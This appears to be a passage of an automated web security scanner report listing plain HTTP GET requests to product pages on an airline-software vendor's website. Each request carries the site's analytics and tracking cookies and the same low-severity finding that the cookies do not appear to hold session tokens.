GET /home/products_services/product/sabre_aircentre_recovery_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322681; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_recovery_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322148; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_roster_maker HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322681; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A2%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_staff_admin HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322679; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_staff_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322691; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_aircentre_staff_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322691; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_airport_data_intelligence HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322704; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_airvision_cargo_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322708; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_airvision_codeshare_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322706; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_airvision_fares_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322720; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_airvision_fleet_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322725; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_airvision_group_ecommerce HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322733; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_community_portal HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_reaccommodation_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_revenue_integrity HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322859; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A1%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_in-flight%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A4%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/technical_records_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/technical_records_hub/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322173; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product/travel_bank HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322899; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/product_index HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_acars_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322609; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A1%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3Bi%3A2%3Bs%3A35%3A%22%2Fproducts_services%2Fsabresonic_sell%2F%22%3Bi%3A3%3Bs%3A54%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_accounting%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_airvision_fleet_manager%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_airspace_flow_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_airspace_flow_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322610; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fproducts_services%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_crew_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322607; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/products_services/sabre_aircentre_crew_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322608; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A1%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_airvision_schedule_manager%2F%22%3B%7D;
